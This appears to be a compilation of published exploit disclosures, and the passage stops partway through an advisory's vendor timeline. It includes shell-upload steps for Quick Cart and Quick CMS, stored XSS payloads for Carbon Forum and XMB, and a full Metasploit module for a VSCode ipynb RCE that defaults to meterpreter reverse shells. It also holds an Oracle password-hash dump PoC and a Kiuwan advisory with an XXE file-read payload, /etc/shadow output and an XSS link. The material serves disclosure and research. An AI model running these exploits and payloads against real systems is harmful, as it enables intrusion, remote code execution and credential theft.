<pre><code># Title : Authenticated Remote Code Execution & Shell Upload<br /># Product : Quick Cart<br /># Vendor : https://opensolution.org/<br /># Affected Version : 6.7<br /># Researcher : Eagle Eye<br /># Tested on : Window & Linux<br /># Date : 11/06/2024<br /># Affected path : admin.php , core/common-admin.php, database/config.php<br /># Affected function : saveVariables()<br /># Report : Already contact the vendor but no response<br /><br /># Description : Unfiltered parameter that post into admin.php?p=tools-config override any<br />$config key value cause to unwanted file inclusion and allowed file extension overriding<br />lead to remote code execution.<br /># Step to reproduce (Method 1)<br />- login at admin.php<br />- click Products and New Product from top navbar<br />- On the right panel, choose add file<br />- Upload malicious script with extension txt or any allowed extension like jpg<br />- click setting on right above<br />- click save and intercept the request<br />- on body parameter, add &default_pages_template=../../files/yourmaliciousfile.txt and proceed<br /># Step to reproduce (Method 2)<br />- login at admin.php<br />- click setting on right above<br />- click save and intercept the request<br />- on body parameter, add &allowed_extensions=php and proceed<br />- click Products and New Product from top navbar<br />- On the right panel, choose add file<br />- And you can upload malicious script with extension php - You may find on path eg: http://website.com/files/shell.php<br /></code></pre>
<pre><code># Title : Authenticated Shell Upload<br /># Product : Quick CMS<br /># Vendor : https://opensolution.org/<br /># Affected Version : 6.7<br /># Researcher : Eagle Eye<br /># Tested on : Window & Linux<br /># Date : 11/06/2024<br /># Report : Already contact the vendor but no response<br /># Affected path : admin.php , core/common-admin.php, database/config.php<br /># Affected function : saveVariables()<br /># Description : Unfiltered parameter that post into admin.php?p=settings override any<br />$config key value cause to file upload allowed extension overriding<br />lead to shell upload.<br /># Step to reproduce<br />- login at admin.php<br />- click setting on right above<br />- click save and intercept the request<br />- on body parameter, add &allowed_not_image_extensions=php and proceed<br />- click Pages and New page from top navbar<br />- On the panel, choose Add files<br />- And you can upload malicious script with extension php - You may find on path eg: http://website.com/files/shell.php<br /></code></pre>
<pre><code># Exploit Title: Persistent XSS in Carbon Forum 5.9.0 (Stored)<br /># Date: 06/12/2024<br /># Exploit Author: Chokri Hammedi<br /># Vendor Homepage: https://www.94cb.com/<br /># Software Link: https://github.com/lincanbin/Carbon-Forum<br /># Version: 5.9.0<br /># Tested on: Windows XP<br /># CVE: N/A<br /><br />## Vulnerability Details<br /><br />A persistent (stored) XSS vulnerability was discovered in Carbon Forum<br />version 5.9.0. The vulnerability allows an attacker to inject malicious<br />JavaScript code into the Forum Name field under the admin settings. This<br />payload is stored on the server and executed in the browser of any user who<br />visits the forum, leading to potential session hijacking, data theft, and<br />other malicious activities.<br /><br />## Steps to Reproduce<br /><br />1. Login as Admin: Access the Carbon Forum with admin privileges.<br />2. Navigate to Settings: Go to the '/dashboard' and select the Basic<br />section.<br />3. Enter Payload : Input the following payload in the Forum Name field:<br /><br /> <script>alert('XSS');</script><br /><br />4. Save Settings: Save the changes.<br />5. The xss payload will triggers<br /></code></pre>
<pre><code># Exploit Title: Persistent XSS in XMB 1.9.12.06<br /># Date: 06/12/2024<br /># Exploit Author: Chokri Hammedi<br /># Vendor Homepage: https://www.xmbforum2.com/<br /># Software Link: https://www.xmbforum2.com/download/XMB-1.9.12.06.zip<br /># Version: 1.9.12.06<br /># Tested on: Windows XP<br /># CVE: N/A<br /><br />## Vulnerability Details<br /><br />A persistent (stored) XSS vulnerability was discovered in XMB 1.9.12.06.<br />The vulnerability allows an attacker to inject malicious JavaScript code<br />into a template or specific fields. This payload is stored on the server<br />and executed in the browser of any user who visits the forum, leading to<br />potential session hijacking, data theft, and other malicious activities.<br /><br />### XSS in Template<br /><br />An attacker can inject malicious JavaScript code into a template:<br /><br />1. Login as Admin: Access the XMB Forum with admin privileges.<br />2. Navigate to the Administration Panel: Go to `/cp.php`, then in "Look &<br />Feel" select "Templates". This will go to `/cp2.php?action=templates`.<br />Select the "footer" template and click edit.<br />3. Enter Payload: Add the XSS payload in the footer template:<br /><br /><br /> <script>alert('XSS');</script><br /><br /><br />4. Save the Change: Click "Submit Changes".<br />5. Trigger the Payload: The XSS payload will trigger anywhere the footer<br />template is rendered.<br /><br />### XSS in News Ticker<br /><br />An attacker can inject malicious JavaScript code into the News Ticker field<br />of the Front Page Options:<br /><br />1. Login as Admin: Access the XMB Forum with admin privileges.<br />2. Navigate to the Administration Panel: Go to `/cp.php`, then in<br />"Settings" go to "Front Page Options".<br />3. Enter Payload: Add the XSS payload in the "News in Newsticker" field:<br /><br /> <img src=x onerror=alert(1)><br /><br /><br />4. Save the Change: Click "Submit Changes".<br />5. Trigger the Payload: The XSS payload will trigger anywhere the News<br />Ticker is displayed eg, home page<br /></code></pre>
<pre><code>##<br /># This module requires Metasploit: https://metasploit.com/download<br /># Current source: https://github.com/rapid7/metasploit-framework<br />##<br /><br />class MetasploitModule < Msf::Exploit::Remote<br /> Rank = ExcellentRanking<br /><br /> include Msf::Exploit::Remote::HttpServer<br /><br /> def initialize(info = {})<br /> super(<br /> update_info(<br /> info,<br /> 'Name' => 'VSCode ipynb Remote Development RCE',<br /> 'Description' => %q{<br /> VSCode when opening an Jupyter notebook (.ipynb) file bypasses the trust model.<br /> On versions v1.4.0 - v1.71.1, its possible for the Jupyter notebook to embed<br /> HTML and javascript, which can then open new terminal windows within VSCode.<br /> Each of these new windows can then execute arbitrary code at startup.<br /><br /> During testing, the first open of the Jupyter notebook resulted in pop-ups<br /> displaying errors of unable to find the payload exe file. The second attempt<br /> at opening the Jupyter notebook would result in successful exeuction.<br /><br /> Successfully tested against VSCode 1.70.2 on Windows 10.<br /> },<br /> 'License' => MSF_LICENSE,<br /> 'Author' => [<br /> 'h00die', # metasploit module<br /> 'Zemnmez'<br /> ],<br /> 'References' => [<br /> ['URL', 'https://github.com/google/security-research/security/advisories/GHSA-pw56-c55x-cm9m'],<br /> ['CVE', '2022-41034'],<br /> ['URL', 'https://github.com/andyhsu024/CVE-2022-41034']<br /> ],<br /> 'DisclosureDate' => '2022-11-22',<br /> 'Privileged' => false,<br /> 'Arch' => ARCH_CMD,<br /> 'Stance' => Stance::Aggressive,<br /> 'Payload' => { 'BadChars' => '&"' },<br /> 'Targets' => [<br /> [<br /> 'Windows',<br /> {<br /> 'Platform' => 'win',<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'cmd/windows/http/x64/meterpreter/reverse_tcp'<br /> }<br /><br /> }<br /> ],<br /> [<br /> 'Linux File-Dropper',<br /> {<br /> 'Platform' => 'linux',<br /> 'DefaultOptions' => {<br /> 'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp'<br /> }<br /> }<br /> ]<br /> ],<br /> 'DefaultTarget' => 0,<br /> 'DefaultOptions' => {<br /> 'WfsDelay' => 3_600, # 1hr<br /> 'URIPATH' => 'project.ipynb'<br /> },<br /> 'Notes' => {<br /> 'Stability' => [CRASH_SAFE],<br /> # on windows it will say the final payload can't be found<br /> # however, it is, seems to be a timing issue, 2nd exploit attempt<br /> # works perfectly<br /> 'Reliability' => [REPEATABLE_SESSION, FIRST_ATTEMPT_FAIL],<br /> 'SideEffects' => [SCREEN_EFFECTS]<br /> }<br /> )<br /> )<br /> register_options(<br /> [<br /> OptString.new('PAYLOAD_FILENAME', [ false, 'Name of the payload file - only required when exploiting on Linux.', 'shell.sh' ]),<br /> OptString.new('WRITABLE_DIR', [ false, 'Name of the writable directory containing the payload file - required when exploiting on Linux .', '/tmp/' ]),<br /> ]<br /> )<br /> end<br /><br /> def check<br /> CheckCode::Unsupported<br /> end<br /><br /> def exploit<br /> unless datastore['URIPATH'].end_with? '.ipynb'<br /> fail_with(Failure::BadConfig, 'URIPATH must end in .ipynb for exploit to be successful')<br /> end<br /> print_status('Starting up web service...')<br /> start_service<br /> sleep(datastore['WFSDELAY'])<br /> end<br /><br /> def on_request_uri(cli, request)<br /> super unless request.uri.end_with? datastore['URIPATH']<br /><br /> if target['Platform'] == 'win'<br /> config = { 'executable' => 'cmd.exe', 'args' => "/c #{payload.raw}" }<br /> else<br /> config = { 'executable' => "/#{datastore['WRITABLE_DIR']}/#{datastore['PAYLOAD_FILENAME']}" }<br /> end<br /><br /> pload = JSON.dump({ 'config' => config })<br /> pload = CGI.escape(pload).gsub('+', '%20') # XXX not sure if this is needed or not, but it works<br /><br /> ipynb = %|{<br />"cells": [<br /> {<br /> "cell_type": "markdown",<br /> "metadata": {},<br /> "source": [<br /> "<img src=a onerror=\\"let q = document.createElement('a');q.href='command:workbench.action.terminal.new?#{pload}';document.body.appendChild(q);q.click()\\"/>"<br /> ]<br /> }<br />]}|<br /><br /> send_response(cli, ipynb, {<br /> 'Connection' => 'close',<br /> 'Pragma' => 'no-cache',<br /> 'Access-Control-Allow-Origin' => '*'<br /> })<br /><br /> print_status("Sent #{datastore['URIPATH']} to #{cli.peerhost}")<br /> end<br /><br />end<br /></code></pre>
<pre><code>Title: CVE-2020-2969 – Unauthorized Access to Password Hashes by Account with DBA role<br />Product: Database<br />Manufacturer: Oracle<br />Affected Version(s): 11.2.0.4, 12.1.0.2, 12.2.0.1, 18c, 19c<br />Tested Version(s): 11.2.0.4, 12.1.0.2, 12.2.0.1, 18c, 19c<br />Risk Level: Medium<br />Solution Status: Fixed<br />CVE Reference: CVE-2020-2969<br />Base Score: 6.6 <br />Author of Advisory: Emad Al-Mousa<br /><br /><br />*****************************************<br />Vulnerability Details:<br /><br />Vulnerability in the Data Pump component of Oracle Database Server. Supported versions that are affected are 11.2.0.4, 12.1.0.2, 12.2.0.1, 18c and 19c. Difficult to exploit vulnerability allows high privileged attacker having DBA role account privilege with network access via Oracle Net to compromise Data Pump. Successful attacks of this vulnerability can result in takeover of Data Pump.<br /><br />The presented scenarios illustrates that an account with “DBA” role can still view/extract the password hashes although the account can’t directly query SYS.USER$ table as a security enhancement since “select any dictionary” system privilege doesn’t provide access to SYS.USER$ anymore<br /><br />*****************************************<br />Proof of Concept (PoC):<br /><br />This simulation was performed in Oracle Non-CDB environment, and is applicable of course in CDB setup also.<br /><br />SQL> create user ninja identified by hello_123;<br /><br /><br />SQL> grant create session to ninja;<br /><br /><br />SQL> grant dba to ninja;<br /><br /><br />SQL> alter user ninja default role all;<br /><br /><br />*** when attempting to select from SYS.USER$ the account will not be able since the system privilege “SELECT ANY DICTIONARY” is changed by restricting direct access to multiple SYS tables such as USER$, ENC$,DEFAULT_PWD$, LINK$, USER_HISTORY$, CDB_LOCAL_ADMINAUTH$<br /><br />SQL> select * from sys.user$;<br />select * from sys.user$<br /> *<br />ERROR at line 1:<br />ORA-01031: insufficient privileges<br /><br />** I will perform dump to the system data file to gain access to the hashed passwords<br /><br />SQL> alter system dump datafile 1 block min 210 block max 215;<br /><br />** Then immediately I will check the generated trace file name using the query:<br /><br />SQL> select * from v$diag_info where NAME='Default Trace File';<br /><br />** I will query the “payload” column of the view V$DIAG_TRACE_FILE that will read the generated trace file contents:<br /><br />SQL> select payload from V$DIAG_TRACE_FILE_CONTENTS where TRACE_FILENAME='ORCLCDB_ora_6029.trc';<br /><br />// the password hash will be exposed in the trace file !<br /><br />After applying Oracle July 2020 CPU patches- try to re-simulate again:<br /><br />SQL> create user ninja identified by hello_123;<br /> <br /> <br />SQL> grant create session to ninja;<br /> <br /> <br />SQL> grant dba to ninja;<br /> <br /> <br />SQL> alter user ninja default role all;<br /> <br /> <br />SQL> show user<br />USER is "NINJA"<br /><br />SQL> select * from sys.user$;<br />select * from sys.user$<br /> *<br />ERROR at line 1:<br />ORA-01031: insufficient privileges<br /> <br /> <br />SQL> alter system dump datafile 1 block min 210 block max 215;<br />alter system dump datafile 1 block min 210 block max 215<br />*<br />ERROR at line 1:<br />ORA-01031: insufficient privileges<br /> <br />SQL> select * from v$diag_info where NAME='Default Trace File';<br /> <br /> INST_ID NAME<br />---------- ----------------------------------------------------------------<br />VALUE<br />--------------------------------------------------------------------------------<br /> CON_ID<br />----------<br /> 1 Default Trace File<br />/exp/ora5/diagnostic/diag/rdbms/ora5/ora5/trace/ora5_ora_1171<br />16.trc<br /> <br /><br />SQL> select payload from V$DIAG_TRACE_FILE_CONTENTS where TRACE_FILENAME='ora5_ora_117116.trc';<br /> <br />PAYLOAD<br />--------------------------------------------------------------------------------<br />Trace file <br />/exp/ora5/diagnostic/diag/rdbms/ora5/ora5/trace/ora5_ora_1171<br />16.trc<br /> <br />Oracle Database 19c Enterprise Edition Release 19.0.0.0.0 - Production<br />Version 19.8.0.0.0<br />Build label: RDBMS_19.8.0.0.0DBRU_LINUX.X64_200702<br />ORACLE_HOME: /oraclex/oradbp05/product/19.3<br />System name: Linux<br />Node name: boba<br />Release: 3.10.0-1127.13.1.el7.x86_64<br />Version: #1 SMP Fri Jun 12 14:34:17 EDT 2020<br /> <br />PAYLOAD<br />--------------------------------------------------------------------------------<br />Machine: x86_64<br />Instance name: ora5<br />Redo thread mounted by this instance: 1<br />Oracle process number: 69<br />Unix process pid: 117116, image: oracle@boba (TNS V1-V3)<br /> <br /> <br />*** 2020-07-16T11:09:31.240875+03:00<br /> <br />*** SESSION ID:(1174.5281) 2020-07-16T11:09:31.240917+03:00<br />*** CLIENT ID:() 2020-07-16T11:09:31.240926+03:00<br /> <br />PAYLOAD<br />--------------------------------------------------------------------------------<br />*** SERVICE NAME:(SYS$USERS) 2020-07-16T11:09:31.240932+03:00<br />*** MODULE NAME:(SQL*Plus) 2020-07-16T11:09:31.240938+03:00<br />*** ACTION NAME:() 2020-07-16T11:09:31.240943+03:00<br />*** CLIENT DRIVER:(SQL*PLUS) 2020-07-16T11:09:31.240948+03:00<br /> <br />Error: file 1 can only be dumped with SYSDBA privillege<br /><br /><br /><br />*****************************************<br />References:<br />https://www.oracle.com/security-alerts/cpujul2020.html<br />https://www.oracle.com/security-alerts/cpujul2020verbose.html<br />https://nvd.nist.gov/vuln/detail/CVE-2020-2969<br />https://databasesecurityninja.wordpress.com/2024/06/10/cve-2020-2969-unauthorized-access-to-password-hashes-by-account-with-dba-role/<br /><br /><br /><br /></code></pre>
<pre><code>SEC Consult Vulnerability Lab Security Advisory < 20240606-0 ><br />=======================================================================<br /> title: Multiple critical vulnerabilities<br /> product: Kiuwan SAST on-premise (KOP) & cloud/SaaS<br /> Kiuwan Local Analyzer (KLA)<br /> vulnerable version: Kiuwan SAST <2.8.2402.3<br /> Kiuwan Local Analyzer <master.1808.p685.q13371<br /> Kiuwan SaaS before 2024-02-05<br /> fixed version: Kiuwan SAST 2.8.2402.3<br /> Kiuwan Local Analyzer master.1808.p685.q13371<br /> Kiuwan SaaS after 2024-02-05<br /> CVE number: CVE-2023-49110, CVE-2023-49111, CVE-2023-49112<br /> CVE-2023-49113<br /> impact: critical<br /> homepage: https://www.kiuwan.com<br /> found: 2022-10-28<br /> by: C. Schwarz (Office Bochum)<br /> SEC Consult Vulnerability Lab<br /><br /> An integrated part of SEC Consult, an Eviden business<br /> Europe | Asia<br /><br /> https://www.sec-consult.com<br /><br />=======================================================================<br /><br />Vendor description:<br />-------------------<br />"Thorough code inspection is essential for designing secure software products.<br />While your development team may not have time to comb through every line of code,<br />Kiuwan does. For 20 years, it has been the choice of developers to scan code<br />automatically and remediate defects according to security standards like OWASP,<br />CWE, SANS, and CERT.<br /><br />Static application security testing (SAST) scans for security flaws in the source<br />code without running the program. It is a white-box testing method that is the<br />counterpart to dynamic application software testing (DAST), which tests web applications<br />for run-time vulnerabilities. [...]<br /><br />Our code vulnerability scanning tools create an all-encompassing process that<br />begins in the early stages of development and continues into production. Kiuwan’s<br />static application security testing software fits perfectly into any DevOps environment.<br />It uses a distributed engine and fast analysis to silently add security without<br />causing a bottleneck in your workflows. [...]"<br /><br />Source: https://www.kiuwan.com/code-security-sast/<br /><br /><br />Business recommendation:<br />------------------------<br />The vendor provides a patched version for Kiuwan On-Premise (master.1808.p685.q13371)<br />which should be installed immediately.<br /><br />Although initially communicated otherwise during responsible disclosure in 2022-2023<br />(see timeline below), the vendor confirmed in 2024 that the SaaS/cloud version is affected<br />and will also be patched. The patch date was 2024-02-05, version 2.8.2402.3.<br /><br />An in-depth security analysis performed by security professionals is highly advised,<br />to identify and resolve potential further critical security issues and to verify whether<br />the developed patches really mitigate the identified critical security issues.<br /><br />SEC Consult also submitted further security issues to Kiuwan, such as Docker-related<br />configuration issues which were also fixed during our responsible disclosure.<br /><br /><br />Vulnerability overview/description:<br />-----------------------------------<br />1) XML External Entity Injection (CVE-2023-49110)<br />When the Kiuwan Local Analyzer uploads the scan results to the web app (either<br />on-premises or cloud/SaaS solution), the transmitted data consists of a ZIP<br />archive containing several files, some of them in the XML file format.<br />During Kiuwan's server-side processing of these XML files, it resolves external<br />XML entities, resulting in a XML external entity injection attack.<br /><br />An attacker with privileges to scan source code within the "Code Security"<br />module is able to extract any files of the operating system with the rights<br />of the application server user and is potentially able to gain sensitive files,<br />such as configuration and passwords. Furthermore, this vulnerability also<br />allows an attacker to initiate connections to internal systems, e.g. for<br />port scans or accessing other internal functions / applications such as the<br />Wildfly admin console of Kiuwan.<br /><br /><br />2) Services running as root<br />The Kiuwan web app process is configured to run with root privileges. In case<br />an attacker can compromise the application (such as documented in 1), this<br />provides them with unrestricted access to the system.<br /><br /><br />3) Reflected Cross-Site-Scripting (CVE-2023-49111)<br />For Kiuwan installations with SSO (single sign-on) enabled, an unauthenticated<br />reflected cross-site scripting attack can be performed on the login page. This<br />is possible due to some request parameter values being directly included in a<br />JavaScript block in the response. This is especially critical in business<br />environments using AD SSO authentication, e.g. via ADFS, where attackers<br />could potentially steal AD passwords.<br /><br /><br />4) Insecure Direct Object Reference (CVE-2023-49112)<br />Kiuwan provides an API endpoint to get information about any application,<br />providing only its name. This endpoint lacks proper access control mechanisms,<br />allowing other authenticated users to read information about applications, even<br />though they have not been granted the necessary rights to do so.<br /><br /><br />5) Sensitive Data Stored Insecurely (CVE-2023-49113)<br />The Kiuwan Local Analyzer (KLA) Java application contains several hard-coded secrets in<br />plain text format. In some cases, this can potentially compromise the confidentiality<br />of the scan results.<br /><br /><br />Proof of concept:<br />-----------------<br />1) XML External Entity Injection (CVE-2023-49110)<br />The scan results of the Kiuwan Local Analyzer (KLA) are transmitted to the Kiuwan<br />server (KOP on-premise or SaaS) using several XML files packed in a ZIP archive. Even<br />though the initial upload only contains encrypted .bxml files, the server also parses<br />regular XML files if they are present. A valid result archive with regular XML files<br />can be obtained by clicking on the analysis code within the analysis log feature in<br />the web GUI.<br /><br />[ screenshot xxe1.png ]<br /><br />Then, any XML file inside this archive can be weaponized with an XXE payload.<br />The following snippet is taken from a manipulated metrics_python.xml file to<br />exfiltrate the /etc/passwd file of the server:<br /><br /><?xml version='1.0' encoding='UTF-8'?><br /><!DOCTYPE replace [<br /><!ENTITY xxe SYSTEM "file:///etc/passwd"><br />]><br /><MetricReport technology='python'><br /><ConfidenceFactors><br /><GlobalConf>100.0</GlobalConf><br /></ConfidenceFactors><br /><ResumenGenerico><br />---[SNIP]---<br /><high>100</high><br /><unit>%</unit><br /><category>documentation</category><br /></MetricDefinition><br /></MetricDefinitions><br /><Items><br /><Item id='0' type='system'>metrics: python</Item><br /><Item id='1' parent='0' type='program'>&xxe;</Item><br /><Item id='2' parent='0' type='program'>plugins/engines/smarty.py</Item><br /><Item id='3' parent='0' type='program'>plugins/legacy_engines/__init__.py</Item><br />---[SNIP]---<br /><br />After re-uploading the malicious archive, the server parses the XML files and<br />triggers the XXE injection. The results of this particular payload can be<br />found in the files tab of the code security module.<br /><br />[ screenshot xxe2.png ]<br /><br />The following PUT request can be used to upload the manipulated ZIP file<br />(gathered from capturing the request between Kiuwan Local Analyzer and the server):<br />-----------------------------------------------------------------------------<br />PUT /saas/rest/v1/applications/analyses/report HTTP/1.1<br />Content-Type: multipart/form-data; boundary=Boundary_1_215423993_1666774847780<br />User-Agent: KiuwanLocalAnalyzer/master.1706.p646.q13222 (Java/11.0.16; Linux 5.19.0-kali2-amd64)<br />Authorization: Basic [...]<br />X-CSRF-TOKEN: b2a3a08e-3e24-4e43-98e1-870fa4b8279c<br />X-KW-CORPORATE-DOMAIN-ID: <removed><br />MIME-Version: 1.0<br />Host: KIUWAN_HOST<br />Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2<br />Connection: close<br />Content-Length: 48193<br /><br />--Boundary_1_215423993_1666774847780<br />Content-Type: text/plain<br />Content-Disposition: form-data; name="label"<br /><br />XXE test<br />--Boundary_1_215423993_1666774847780<br />Content-Type: text/plain<br />Content-Disposition: form-data; name="start"<br /><br />2022-10-26T09:00:13Z<br />--Boundary_1_215423993_1666774847780<br />Content-Type: text/plain<br />Content-Disposition: form-data; name="applicationId"<br /><br />123<br />--Boundary_1_215423993_1666774847780<br />Content-Type: text/plain<br />Content-Disposition: form-data; name="qualityModelId"<br /><br />1<br />--Boundary_1_215423993_1666774847780<br />Content-Type: text/plain<br />Content-Disposition: form-data; name="isDelivery"<br /><br />false<br />--Boundary_1_215423993_1666774847780<br />Content-Type: application/octet-stream<br />Content-Disposition: form-data; filename="results.zip"; name="reports"<br /><br />PK [...removed XXE ZIP file contents...]<br />--Boundary_1_215423993_1666774847780--<br />-----------------------------------------------------------------------------<br /><br />[ screenshot xxe3.png ]<br /><br />2) Services running as root<br />By abusing the XXE injection documented above to read the "/etc/shadow" file of<br />the Kiuwan server, it is possible to retrieve its contents:<br /><br />root:locked::0:99999:7:::<br />bin:*:17834:0:99999:7:::<br />daemon:*:17834:0:99999:7:::<br />adm:*:17834:0:99999:7:::<br />lp:*:17834:0:99999:7:::<br />sync:*:17834:0:99999:7:::<br />shutdown:*:17834:0:99999:7:::<br />halt:*:17834:0:99999:7:::<br />mail:*:17834:0:99999:7:::<br />operator:*:17834:0:99999:7:::<br />games:*:17834:0:99999:7:::<br />ftp:*:17834:0:99999:7:::<br />nobody:*:17834:0:99999:7:::<br />systemd-network:!!:17870::::::<br />dbus:!!:17870::::::<br />jboss:!!:17940::::::<br /><br />As only root can read this file, it can be concluded that the application server runs<br />with root privileges. This could also be verified in the docker environment of<br />Kiuwan on-premises.<br /><br /><br />3) Reflected Cross-Site-Scripting (CVE-2023-49111)<br />The XSS injection is possible on the login page of Kiuwan via the message parameter.<br />To exploit the vulnerability, a victim must click on a link with the following<br />payload:<br /><br />https://KIUWAN_HOST/saas/web/login.html?domain=XSS&message=x'%2Beval('alert(document.location)');//&sso=off<br /><br />The injected JavaScript code is only executed when the victim has a Kiuwan<br />domain id cached in their web browser's localstorage (SSO-enabled users).<br /><br />[ screenshot xxs.png ]<br /><br /><br />4) Insecure Direct Object Reference (CVE-2023-49112)<br />By directly querying the following API endpoint, an authenticated user with<br />standard privileges to access the "code security" module can query information<br />about any other application, even though the permissions have not been assigned<br />for those specific applications:<br /><br />https://KIUWAN_HOST/saas/rest/v1/info/application?application=APPLICATION_NAME<br /><br /><br />5) Sensitive Data Stored Insecurely (CVE-2023-49113)<br />Several credentials were found in the JAR files of the Kiuwan Local Analyzer.<br /><br />a) GitHub<br />The JAR file "lib.engine/insight/optimyth-insight.jar" contains the file<br />"InsightServicesConfig.properties", which has the configuration tokens<br />"insight.github.user" as well as "insight.github.password" prefilled with<br />credentials. At least the specified username corresponds to a valid GitHub<br />account. SEC Consult did not test those credentials.<br /><br />b) Encryption Key<br />The JAR file "lib.engine/insight/optimyth-insight.jar" also contains the file<br />"es/als/security/Encryptor.properties", in which the key used for encrypting<br />the results of any performed scan.<br /><br /><br />Vulnerable / tested versions:<br />-----------------------------<br />All tests have been performed on Kiuwan on-premise Version 2.8.2110.2, as well<br />as the respective Local Analyzer (KLA) version master.1706.p646.q13222.<br /><br />It was assumed that Kiuwan SaaS/cloud was also affected by the identified vulnerabilities<br />during initial responsible disclosure.<br /><br />Originally, the vendor claimed that vulnerability 1) is not exploitable in the SaaS<br />version as HTTPS certificates are being verified, nevertheless we provided the vendor<br />with arguments why we still thought that it was exploitable, but because of lacking<br />test environment this could not be confirmed on our side.<br /><br />In early 2024 the vendor confirmed that the SaaS version is affected and is also going<br />to be patched.<br /><br /><br />Vendor contact timeline:<br />------------------------<br />2022-11-08: Contacting vendor through established contacts, sharing detailed<br /> PDF vulnerability assessment report.<br />2022-11-11: Sharing this security advisory information in addition.<br />2022-11-16: Asking for a status update; response that findings were escalated<br /> internally and they are actively being reviewed.<br />2022-11-23: Asking for a status update regarding patch availability and whether<br /> further information is needed.<br />2022-11-23: Vendor: Analysis complete. Critical issues will be fixed before the end<br /> of CY23Q1. Lower risk issues will be evaluated for changes during CY23Q1<br /> with possible implementation during CY23Q2.<br />2022-11-25: Telling the vendor that XSS should also be fixed earlier as the use of SSO<br /> bears an even higher risk of stealing enterprise AD credentials.<br />2022-11-29: Vendor: the team are taking it into consideration.<br />2023-05-09: Asking for a status update.<br />2023-05-16: Vendor: the XSS issues will be fixed in the upcoming security update release,<br /> which is planned in the next two months.<br />2023-05-17: Asking for a status update for all of the identified issues again.<br /> Informing vendor about next steps (requesting CVE numbers, etc).<br />2023-05-31: Vendor response: "all critical issues are being addressed in the next security<br /> update project", they are furthermore adding more details on the specific<br /> issues:<br /> 1) XXE - Vendor: affects KOP users more than cloud, as KLA verifies HTTPS<br /> certificate of the server and there is no way to download<br /> or modify the results as they are encrypted.<br /> Vendor quote: "Customers using the KOP installation should take standard<br /> measures to protect their private networks from external actors while<br /> Kiuwan develops a patch for this issue."<br /> Our answer: it is a local Java application and HTTPS checks can be bypassed.<br /> Encryption key is even stored in the local source code.<br /> 2) Services as root - Vendor: "There is no common exploit for this issue."<br /> Our answer: yes, the XXE issue or any other code execution + file disclosure<br /> issue would be a problem; giving hints to least privileges and<br /> providing links to OWASP for further guidance.<br /> 3) XSS - Vendor: only affects SSO-enabled clients. "In this case, standard<br /> security policies should be followed for the potentially insecure<br /> links sent to those users."<br /> Our answer: requesting info if this will be fixed or not and stating that<br /> SSO-enabled users have an even higher risk of stolen enterprise<br /> credentials.<br /> 4) IDOR - Vendor: "only impacts users within the customer's private domain.<br /> It means that information is not leaked outside the customer's<br /> boundaries"<br /> Our answer: requesting further info what is meant by "private domain".<br /> No response to our question.<br /> 5) Data leakage: "There is no common exploit for this issue."<br /> Our answer: Yes there is, the encryption key can be used to exploit the<br /> documented XXE issue.<br /><br />2023-06-02: Answering with very detailed statement (see our answers from above) on the why<br /> the security issues need to be fixed and when the "next security update<br /> project" is planned to release the patch.<br />2023-06-13: Vendor proposes call to discuss open questions.<br />2023-06-21: Conference call, clarifying next steps and that all issues are being worked on.<br />2023-09-07: Asking for status update<br /> Vendor response: "development is complete, working through quality control.<br /> Update planned within the next month."<br />2023-11-08: Asking for status update, affected/fixed version numbers and how customers<br /> will be informed.<br /> Vendor response: team made significant progress, final tests for general<br /> availability and release by end of November.<br />2023-11-30: Update from vendor (compliance team): "we are still actively working on<br /> this update and project this to be ready by the end of December."<br />2023-12-07: Expressing our concerns and dissatisfaction about the delay again.<br /> No response.<br />2024-01-16: Asking once again about the patch status as no information was received and<br /> the vendor's communicated release date has passed again.<br /> Furthermore, asked about vendor communication to customers (security note),<br /> where customers can download the patch and changelog, and that we now plan<br /> to release the advisory latest within four weeks on 13th February 2024.<br />2024-01-17: Vendor: escalated our email to product management, provided the following<br /> schedules for the resolution:<br /> 23-Jan-2024 - Kiuwan Cloud (Kiuwan SaaS)<br /> 31-Jan-2024 - Kiuwan on premise (KOP) release<br /> No answer regarding customer communication and changelog questions.<br />2024-01-18: Vendor: confirms the dates again, no input regarding other questions.<br />2024-01-19: Asking vendor again about version numbers, where to obtain the patch, whether<br /> all vulnerabilities will be fixed now including SaaS version. No response.<br />2024-01-23: Communicated patch date for SaaS passed without patch being available nor<br /> any info from vendor.<br />2024-01-31: Communicated patch date for KOP passed without patch being available nor<br /> any info from vendor.<br />2024-02-05: Asking for a status update and answers to our questions again, assigning<br /> CVE numbers (CVE-2023-49110, CVE-2023-49111, CVE-2023-49112, CVE-2023-49113)<br /> and sending them to the vendor. Informing the vendor that we<br /> will proceed now to release our advisory on 13th February because they are<br /> non-responsive.<br />2024-02-05: Vendor: did have delays, cloud security update is released today which fixes<br /> all identifies issues. KOP update will be scheduled after it goes through QE<br /> testing. Asking if we have further questions.<br />2024-02-05: Asking about answers to our previous, still open questions again.<br /> 1) Which version number for KOP is affected and which version will the patch<br /> have?<br /> 2) How can a customer verify to have the patch installed?<br /> 3) Whether and how/where will your customers be notified about the patch/<br /> security update?<br /> 4) Where to obtain the patch?<br /> 5) What is this changelog about https://www.kiuwan.com/docs/display/K5/Change+log<br /> It does not correlate to anything we see in our KOP installation.<br />2024-02-05: Vendor: the cloud security update has been released today and is in production.<br />2024-02-05: Vendor answers questions:<br /> Regarding KOP, several updates are combined with the security release, no ETA<br /> yet for KOP release, but no significant delay.<br /> 1) version updates will come with the KOP release; currently improving<br /> versioning, changelogs will begin to contain version numbers.<br /> 2) New baseline version numbers will be released and work forward from there.<br /> 3) Release notes information will be included in the changelog. Informing<br /> customers will be discussed via Sales and Marketing.<br /> 4) Answer about release notes and changelog which will be more robust and<br /> versioned. No info regarding where to obtain the patch.<br /> 5) Correlation is being worked on and improved.<br />2024-02-05: Offering to postpone the advisory release to end of February.<br />2024-02-12: Vendor: still working an answers to our questions, release dates ready by<br /> "end of the week".<br />2024-02-23: Asking for a status update as nearly two weeks have passed; no response.<br />2024-03-04: Still no response from vendor, starting preparation of advisory release.<br /> Communicating release date for "early next week".<br />2024-03-07: Vendor: Apologies for delay, cloud was patched on 6th February. Now<br /> finalizing release with updates for KOP customers. Already "in final<br /> stages of testing", release will be available "by end of April at the<br /> latest", asking to hold off publishing the advisory. Customers will be<br /> notified through support and/or sales with download link, customers<br /> can verify updated version by checking changelogs.<br />2024-03-08: Asking if they mean "end of April" this year, extending once more.<br /> Expressing unsatisfactory process again, as Kiuwan already communicated<br /> back in September 2023 that the patch is ready.<br />2024-03-11: Vendor confirms end of April this year, extra delay was needed to test<br /> the patch 